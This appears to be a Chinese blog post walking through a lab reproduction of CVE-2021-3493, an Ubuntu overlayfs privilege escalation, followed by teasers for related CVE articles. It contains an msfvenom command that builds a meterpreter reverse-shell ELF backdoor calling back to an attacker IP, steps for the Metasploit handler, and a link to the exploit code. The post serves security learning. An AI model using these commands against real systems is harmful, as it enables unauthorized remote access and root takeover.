CVE-2021-3493漏洞复现案例(提权)

已于 2023-07-24 10:56:05 修改
阅读量667 收藏 4
点赞数 2
文章标签: 网络 安全
于 2023-07-24 10:43:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_50281314/article/details/131890870
版权

下面复现需要在虚拟机中完成:

CVE-2021-3493漏洞案例

  • 可以在下面链接下载关于该漏洞的代码脚本
https://github.com/inspiringz/CVE-2021-3493

1、攻击工具及环境说明(在虚拟机上完成)

Ubuntu Kylin(20.04):作为受攻击目标。

 Kali Linux(2021):作为攻击者的攻击平台。

 首先确保两台主机之间的网络连接:确保Ubuntu Kylin和Kali Linux之间可以进行网络通信

2、攻击过程和漏洞利用

 在kali上生成后门脚本文件:参考下面命令(IP地址需要更改)

msfvenom -p linux/x84/meterpreter/reverse_tcp LHOST=192.168.153.152 LPORT=4444 -f elf -o shell.elf

上传后门文件到靶机

进入kali的msf选择对应的模块:

use exploit/multi/handler

设置set payload为 和linux相关

设置LHOST为靶机的地址

运行:run,同时在靶机上运行上传的后门脚本(.elf文件)

在kali上可以监听到靶机:(如图所示)

上传漏洞利用脚本代码和工具

进入shell,ls查看靶机目录下的脚本文件,编译脚本

运行编译生成的文件,同时查看用户信息,获得管理员root管理员权限

漏洞复现 CVE-2021-3493——Linux kernel 特升 +升级ubuntu内核的方法 (附exp)
gjgj的博客
05-19 5395
1、漏洞简述 linux kernel一般指Linux内核。Linux是一种开源电脑操作系统内核。它是一个用C语言写成,符合POSIX标准的类Unix操作系统。 Linux内核中overlayfs文件系统中的Ubuntu特定问题,它未正确验证关于用户名称空间的文件系统功能的应用。 由于Ubuntu附带了一个允许非特的overlayfs挂载的补丁,因此本地攻击者可以使用它来获得更高的特。 2、影响版本 Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04.
Linux kernel特漏洞(CVE-2021-3493)复现
玄道的网安博客
04-23 738
简介 linux kernel一般指Linux内核。Linux是一种开源电脑操作系统内核。它是一个用C语言写成,符合POSIX标准的类Unix操作系统。 漏洞概述 linux内核中的overlayfs文件系统中没有正确地验证用户名称空间和底层文件系统中文件功能的设置。由于非特用户名称空间和Ubuntu内核中允许非特覆盖的补丁的组合,攻击者可以使用它来获得更高的特。 影响版本 Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.0...
CVE漏洞复现-CVE-2021-3493 Linux 内核漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-09 1105
CVE-2021-3493 用户漏洞是 Linux 内核中没有文件系统中的 layfs 中的 Ubuntu over 特定问题,在 Ubuntu 中正确验证有关名称空间文件系统的应用程序。buntu 内核代码允许低限用户在使用 unshare() 函数创建的用户命名空间中挂载 overlayfs 文件系统。
CVE-2021-3493 Linux kernel漏洞复现
crowsec
01-26 1191
微信公众号:乌鸦安全 扫取二维码获取更多信息! 更新日期:2021.04.21 参考链接 https://github.com/briskets/CVE-2021-3493 https://www.pwnwiki.org/index.php?title=CVE-2021-3493_linux_kernel_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E/zh-cn 影响版本 Ubuntu 20.10 Ubu..
CVE-2025-30208(文件读取)漏洞复现
最新发布
ljh123321ljh的博客
03-30 750
漏洞源于Vite在处理URL查询参数时的逻辑缺陷。当请求路径包含特定参数(**如?import&raw?**)时,Vite对URL尾部分隔符(如?和&)的正则匹配不严格,导致安全检查被绕过。中存在的一个高危逻辑漏洞,允许攻击者通过构造特殊的URL绕过文件访问限制,读取服务器上的任意文件(如配置文件、密钥、数据库凭据等)。CVE-2025-30208是。2.在fofa搜索,寻找存在漏洞ip。3.尝试传参,得到相关信息。
漏洞复现CVE-2021-3493
白帽子九一
02-16 3126
漏洞简介# Linux 内核中 overlayfs 文件系统是 Ubuntu的特定问题,由于没有正确的验证文件系统功能在用户名称空间中的应用,从而导致攻击者可以安装一个允许未授挂载的 overlayfs 修补程序来限 影响版本# ubuntu 20.04 ubuntu 16.04 ubuntu18.04 ubuntu 14.04 本次复现为ubuntu20.04版本 漏洞复现# test@linux:~# git clone https://github.com/ASkyeye/CVE-
CVE-2021-3493】——漏洞复现、原理分析以及漏洞修复
IronmanJay
05-24 3140
Linux内核中的overlayfs实现未能在用户命名空间方面正确验证对底层文件系统中文件设置文件能力的操作。由于未特用户命名空间与Ubuntu内核中允许未特的overlay挂载的补丁的组合,攻击者可以利用这一漏洞获取升的限。
CVE-2021-3493:Linux kernel特漏洞复现
Appleteachers的博客
04-22 1298
CVE-2021-3493:Linux kernel特漏洞复现 0x01 简介 linux kernel一般指Linux内核。Linux是一种开源电脑操作系统内核。它是一个用C语言写成,符合POSIX标准的类Unix操作系统。 0x02 漏洞概述 Linux内核中overlayfs文件系统中的Ubuntu特定问题,它未正确验证关于用户名称空间的文件系统功能的应用。由于Ubuntu附带了一个允许非特的overlayfs挂载的补丁,因此本地攻击者可以使用它来获得更高的特。 0x03 影响版本 Ubun
Ubuntu特漏洞CVE-2021-3493
Li-D的博客
04-25 3904
漏洞描述 OverlayFS漏洞允许Ubuntu下的本地用户获得root限。Linux内核中overlayfs文件系统中的Ubuntu特定问题,在该问题中,它未正确验证关于用户名称空间的文件系统功能的应用程序。由于Ubuntu附带了一个允许非特的overlayfs挂载的补丁,因此本地攻击者可以使用它来获得更高的特。 影响版本 Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM
CVE复现计划
qq_41071646的博客
03-19 412
去看雪论坛上搜 按时间倒数顺序 太简单的略过 难得不放过 看不懂网上肯定有其它人写的多搜搜 然后多查查资料 从困难中才能学到东西 但是如果真的搞不了,就放一放,过几天再搞 过几天可能思路就打开了 来自某个学姐的建议 感觉非常有用 ...
CVE-2024-38819:Spring 框架路径遍历 PoC 漏洞复现
12-16
CVE-2024-38819漏洞是一个影响Spring框架的严重安全漏洞。Spring框架是广泛应用于Java开发中的一个开源框架,它供了全面的编程和配置模型。该漏洞特别关注于路径遍历问题,这是一种安全漏洞,攻击者可以利用它来...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CMS Made Simple (CMSMS) 前台SQL注入漏洞 CVE-2019-9053.md
04-08
5. 后台SSTI漏洞CVE-2021-26120):服务器端模板注入(Server-Side Template Injection,简称SSTI)是一种安全漏洞,攻击者可以利用它来注入恶意代码。在CMSMS中,与前台SQL注入漏洞相结合,攻击者可以利用后台的...
Storm命令注入漏洞(CVE-2021-38294) - 漏洞环境搭建 & 复现
m0_74048540的博客
12-26 1695
本文详细介绍了如何搭建Apache Storm集群环境,并展示了一种利用Storm的漏洞进行攻击的实战案例。首先,我们介绍了ZooKeeper和Storm的安装步骤,以及如何创建一个简单的计算作业;接着,供了Java代码的示例,用于成功执行命令并验证漏洞的存在。最后,重点讲解了如何将该漏洞利用程序打包为JAR文件,并使用Python脚本进行二次验证。通过本文,读者将能够理解Storm的基本架构,掌握漏洞复现的实用技巧,并体验到安全测试中的实际操作方法,增强对分布式系统安全性的认识。
【Linux】kaili实现CVE-2019-5736漏洞复现
2302_76195174的博客
04-29 1858
Docker逃逸是一个安全问题,指的是攻击者从Docker容器逃逸到宿主机系统,获取更高的限,从而控制整个系统。下面我将详细介绍Docker逃逸的原理、常见方法以及如何防范。
CVE-2017-10271复现
qq_56258713的博客
07-03 3191
CVE-2017-10271复现
CVE-2017-14849复现
m0_46580995的博客
07-18 390
CVE-2017-14849复现 cve描述 Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to “…” handling was incompatible with the pathname validation used by unspecified community modules. 意思是 node.js 8.5.0 到8.6.0 之间的版本会造成目录穿
CVE-2019-14271复现
PMJ的博客
11-26 2467
CVE-2019-14271:加载不受信任的动态链接库 docker cp依赖的docker-tar组件会加载容器内部的nsswitch动态链接库,但自身却未被容器化。 hacker可以通过劫持容器内的nsswitch动态链接库实现对宿主机进程的代码注入,获得宿主机上的代码执行能力 问题所在:高限进程自身未容器化,却加载了不可控的动态链接库,一旦控制了容器就可以通过修改容器内动态链接库来实现在宿主机上以root限执行任意代码。 原理 执行docker cp后,docker daemon会启动一个dock
CVE-2020-0796复现(基于kali实现)
m0_74988425的博客
03-06 3378
本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。然而,在这里使用的是`bind_tcp`,它不需要指定远程主机,因此在这种情况下,这个命令没有实际效果。CVE-2020-0796是指影响微软Windows 10和Windows Server 2019的一个漏洞,通常被称为"SMBGhost"或"CoronaBlue"。2. 网络分段: 将网络分为不同的区域,将不同的系统放置在不同的网络中。
cve-2021-44228漏洞复现分析
03-03
### CVE-2021-44228 漏洞复现分析 #### Log4j 的介绍 Log4j 是一个广泛使用的Java日志记录库,由Apache软件基金会开发。该库允许开发者通过配置文件灵活控制日志信息的格式、级别以及输出位置。 #### 漏洞概述 CVE...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金铃桃夭

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值